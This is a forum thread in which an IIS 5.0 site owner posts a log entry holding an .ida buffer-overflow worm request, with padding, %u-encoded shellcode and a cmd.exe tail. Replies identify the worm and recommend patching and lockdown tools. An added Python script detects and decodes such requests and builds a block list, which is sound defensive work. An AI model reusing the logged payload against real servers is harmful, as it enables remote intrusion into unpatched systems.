  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 344
  • Last Modified:

Log File Records

I have a website (on Win2k & IIS 5.0) that incidentally goes down every Sunday night. All this time I suspected ASP.NET of being the problem, with aspnet_wp.exe not restarting, but I found an interesting correlation between the downtime and my log files.

Below is one row of an HTTP request sent last Saturday, right before my server went down. I see this post being made about 10 times before my server went down. Can anyone tell me a bit about this?

My first assumption was that ASP.NET is crashing IIS and therefore the log files are getting erroneous input, but looking at the IP below, I suspect wrongdoing. This is not my IP, not my host's IP, and it looks to me like someone is trying to exceed the request buffer and access memory space.

Can anyone tell me what this code would do? How can I secure my server from being affected by this type of attack?

LOG:
-------------------------------------------------
217.56.79.212 - - [30/Apr/2005:08:59:51 -0800] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&ë+_됐èõÿÿÿoð}-‹÷f¸H3Éf‹È´™ü¬2Īâú$쟙™eªP(¹)½k7_Þf™q”™™q™™q×›™™Úœ™™qÈ›™™q½š™™Þœ™™q'˜™™Öœ™™Þœ™™qæ›™™Òœ™™qÇ™™™q™™™a™íyÒœ™™Éf+”Ÿ™™Þœ™™Éf+”Ÿ™™¶œ™™Éf+œ™™¢œ™™Éf+œ™™!™™™™ÉÖœ™™Éf+\œ™™!™™™™Éf+Oœ™™ZÒœ™™ó™ó€š˜™™ÉÒœ™™Éf+šŸ™™Z”“Îð÷÷íØìíöØííøúò¹Ï«©”“”“ñ+™™™f+&œ™™¶œ™™q_™™™af–/™™™a™íÎ++++󙦜™™Éñ™™™Úœ™™É¶œ™™Éf+/œ™™a™–™™™ó™¦œ™™ÉÚœ™™ÉÒœ™™Éf+šŸ™™afíý++++ró™ñ™™™Úœ™™ÉÒœ™™Éf+‘Ÿ™™a™í§++++afí¬++++ªBʦœ™™ÊÉÚœ™™É¢œ™™Éf+5œ™™a™í++++p²fffªYÑZªYZªBʽ›™™ÊªBÊÊÊÉf++œ™™a™í’++++½›™™Z!ffffZ™™™™Úœ™™^™Ý™™™Éf+þœ™™Úœ™™ªœ™™ÚÙÚ¥®œ™™Ú¡!˜˜™™ÚµÊʪYÉÉÉÙÉÑÉÉ쟙™ÉªYÉf+™ªœ™™Éf+œ™™®œ™™Éf+œ™™Úœ™™™Zñ™™™óÙf+9œ™™ZªYÉw›™™^™•™™™Éªœ™™É¶œ™™Éf+Åœ™™ªYÉw›™™É¢œ™™É®œ™™Éf+Åœ™™Z™™™™™™™™˜™™™É¸š™™^š‰™™™Ê۝™™ÊÉf+eœ™™Aa™ÁåEZZ‰™™™óŠöš™™Éf+½Ÿ™™öš™™Éf+©Ÿ™™a™í»++++é•ge4a™íŠ++++™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™Úœ™™Éó›f+€Ÿ™™ó™ó˜ó›f+pœ™™af–™™™Þœ™™¦œ™™^š˜™™™óÊóñff™™Éf+§Ÿ™™a™ìé++++ÿöŸ™™ÿݝ™™蟙™ߝ™™afì–++++q³fffߝ™™Þœ™™ó‰۝™™ÊÉf+iœ™™a™ìº++++óœÞœ™™Éf+lœ™™a™ì’++++Þœ™™ZªYZ›™™ú™™™™™™™™™™™™!™™hî¡ÔÃ+™íž++++ÑrhA꥚jïášj繚b׍ªKÏÎȦšb,ÁŸ™™ªP(žjÿ>í•++++ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘ß…šZXx›šX™šZòŸ™™ZÒŸ™™qÉ™™™þŸ™™Z$Êœ™™^Îq¶™™™ÆÉ«YªPnHek7Á¦™íŽ++++ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×ÜÕª«™ÚëüøíüÉðéü™ÞüíÊíøëíìéÐ÷ÿöØ™ÚëüøíüÉëöúüêêØ™ÚõöêüÑø÷ýõü™Éüüò×øôüýÉðéü™ÞõöûøõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð÷øíüÉëöúüêê™ÜáðíÍñëüøý™™Îʫƪ«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõöêüêöúòüí™ÎÊØÊíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü™êüíêöúòöéí™™™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýëüêê™êëî¨éî™úA®?„cmd.exe$ HTTP/1.1" 404 4203



Thank you all in advance!

- Eyal.
 
0
gidds99Commented:
I think this may be a worm attempting to take advantage of this IIS vulnerability:

http://www.eeye.com/html/Research/Advisories/AD20010618.html
0
 
r-kCommented:
Is your machine patched with the latest updates for Windows and IIS?
0
 
poogy21Author Commented:

All patches have been installed. And I'm not entirely sure that this is actually causing any problem.
I guess it could be a worm. But why would I get hit by a worm directly from Italy? You would imagine that I would get hit by networks closer to my IP block.
But it definitely is a reason for concern.

I have a different problem with ASPNET user permissions and restarting the worker process. But I believe this worm / hacker is triggering a worker process restart.
And since my aspnet_wp.exe is running into permissions problems, my server times out. :( when it pours..


Any ideas on how to go about filtering or blocking this type of mischief?
0
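The question asks what the logged request would do and how to filter it. As an added example (my own script, not code from this thread, from Microsoft, or from the eEye advisory), the following parses NCSA-format log lines like the one in the post, flags requests aimed at the Index Server ISAPI extension (.ida/.idq), decodes the %uXXXX units into the bytes they become in memory, and collects the source IPs worth blocking at the firewall. The log lines are constructed: the first copies the shape of the posted request with the C padding shortened to 240 bytes, the %u prefix kept verbatim and the binary tail dropped; the others are made-up traffic for contrast. The thresholds in `classify` are assumptions tuned to this sample, not a published signature.

```python
import re

# Constructed sample lines in the NCSA common log format the question's IIS
# server is writing. Line 1 mirrors the posted request (padding shortened to
# 240 bytes, %u prefix verbatim, binary tail dropped); lines 2-4 are invented.
IDA_PREFIX = ("%u0aeb%ub890%u898b%u77e8%u0000%u0000%u838b%u0094%u0000"
              "%u408b%u0564%u0150%u0000%ue0ff%u9090")
SAMPLE_LOG = [
    '217.56.79.212 - - [30/Apr/2005:08:59:51 -0800] "GET /NULL.IDA?'
    + "C" * 240 + IDA_PREFIX + '=x HTTP/1.1" 404 4203',
    '10.0.0.5 - - [30/Apr/2005:09:00:02 -0800] "GET /default.aspx HTTP/1.1" 200 5120',
    '217.56.79.212 - - [30/Apr/2005:09:00:12 -0800] "GET /NULL.IDA?CCCCCCCC%u0aeb=x HTTP/1.1" 404 4203',
    '192.0.2.44 - - [30/Apr/2005:09:01:40 -0800] "GET /search.idq?q=test HTTP/1.1" 404 100',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)
IDA_PATH_RE = re.compile(r'\.id[aq]$', re.IGNORECASE)  # Index Server ISAPI extensions
UESCAPE_RE = re.compile(r'%u([0-9a-fA-F]{4})')           # IIS-specific %uXXXX encoding


def parse_line(line):
    """Split one NCSA common-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def longest_run(s):
    """Length of the longest run of one repeated character (the overflow padding)."""
    best = cur = 0
    prev = None
    for ch in s:
        cur = cur + 1 if ch == prev else 1
        prev = ch
        best = max(best, cur)
    return best


def decode_unicode_escapes(query):
    """Turn %uXXXX escapes into the bytes a UTF-16LE buffer holds (low byte first).
    Hand-disassembled, the posted prefix decodes to eb 0a (jmp short +10) ...
    8b 83 94 00 00 00 / 8b 40 64 / 05 50 01 00 00 (load and adjust a pointer)
    / ff e0 (jmp eax): a stub that computes an address and jumps into it."""
    out = bytearray()
    for hexunit in UESCAPE_RE.findall(query):
        out += int(hexunit, 16).to_bytes(2, 'little')
    return bytes(out)


def classify(rec, pad_threshold=100, escape_threshold=8):
    """None for requests not aimed at .ida/.idq; otherwise a finding whose 'level'
    is 'overflow' for an obvious exploit payload or 'probe' for a bare scan.
    The thresholds are assumptions chosen for this sample."""
    path, _, query = rec['target'].partition('?')
    if not IDA_PATH_RE.search(path):
        return None
    pad = longest_run(query)
    escapes = len(UESCAPE_RE.findall(query))
    mentions_cmd = 'cmd.exe' in rec['target'].lower()  # the tail of the posted line
    exploit = pad >= pad_threshold or escapes >= escape_threshold or mentions_cmd
    return {
        'ip': rec['ip'], 'ts': rec['ts'], 'path': path,
        'pad': pad, 'escapes': escapes, 'mentions_cmd': mentions_cmd,
        'shellcode_hex': decode_unicode_escapes(query).hex(),
        'level': 'overflow' if exploit else 'probe',
    }


def scan(lines):
    """Return the .ida/.idq findings and the sorted list of IPs that sent an
    overflow-sized payload (the block list)."""
    findings = []
    for line in lines:
        rec = parse_line(line.strip())
        if rec is None:
            continue
        finding = classify(rec)
        if finding:
            findings.append(finding)
    block = sorted({f['ip'] for f in findings if f['level'] == 'overflow'})
    return findings, block


if __name__ == '__main__':
    found, block = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']:15} {f['level']:9} pad={f['pad']:<4} %u-units={f['escapes']:<3} "
              f"cmd.exe={f['mentions_cmd']} code={f['shellcode_hex'][:24]}...")
    print("block at the firewall:", ", ".join(block))
```

Run it over the real IIS log instead of `SAMPLE_LOG` by reading the file into `scan()`; any .ida/.idq hit on a server that does not run Index Server is noise, and the 'overflow' entries are the ones to feed to the firewall. Blocking at the HTTP layer still matters: the request is handled by the ISAPI filter before the 404 is logged, so the log entry is evidence of the attempt, not proof the server ignored it.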
 
srikrishnakCommented:
First, update all the patches and any latest updates... then use IISLockdown to lock down the IIS web server... Then you can use MBSA to further study the situation.
From the request it seems the requester is requesting some junk... Certainly it's not a valid request, it seems....
Worms can originate from any place on the planet... That's the good and bad of the internet... when you connect to the internet the whole planet is on a single network...
For your ASP.NET question I may not be in a position to solve the issue, but you can modify or change it according to your needs with some help from your programmers...
or our EE gurus can definitely help you...
0
 
r-kCommented:
Yes, highly recommend that you download and run MBSA to see if any patches were missed.
You can get it from:

http://www.microsoft.com/technet/security/tools/mbsahome.mspx
0
 
gidds99Commented:
If all patches are up to date then this should not be an issue, but by the look of your log file someone (or a worm) appears to be trying to open a remote command prompt (with the cmd.exe at the end of the data).

You could try to push the same code to a test server (if you have one available) to test whether your theory on the ASP.NET process restart is correct.

Hope this helps.
0
